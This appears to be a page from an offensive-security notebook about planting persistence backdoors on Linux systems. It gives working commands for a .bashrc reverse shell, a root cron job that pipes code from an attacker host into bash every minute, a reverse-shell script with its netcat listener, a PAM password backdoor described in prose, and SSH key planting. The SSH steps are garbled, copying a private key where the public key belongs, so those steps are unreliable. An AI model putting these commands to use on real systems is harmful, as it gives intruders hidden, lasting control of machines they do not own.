🚪Backdoors

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

`PAM`

This backdoor essentially consists of adding your own password to the pam_unix.so file

pam_unix.so file is responsible for authentication

pam_unix.so uses the unix_verify_password function to verify to user's supplied password :

`.bashsrc`

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

Any user that log in often :

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Put a nc listener

`CronJob`

With a root access

cronjobs file -> /etc/cronjob

Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file :

* *     * * *   root    curl http://$attacker_ip:8080/shell | bash

Add this to the shell file :

#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1

On the attacker machine :

nc -nvlp $port

`SSH`

Consists in saving our ssh keys in some user’s home directory. Then we can access it via ssh.

Generate ssh key

ssh-keygen

Copy our key into the user's .ssh directory

mkdir .ssh 
cp id_rsa .ssh/id_rsa

PreviousCover tracks NextReverse Shells

Last updated 2 years ago

hashtagPAM

hashtag.bashsrc

hashtagCronJob

hashtagWith a root access

hashtagSSH

hashtagGenerate ssh key

hashtagCopy our key into the user's .ssh directory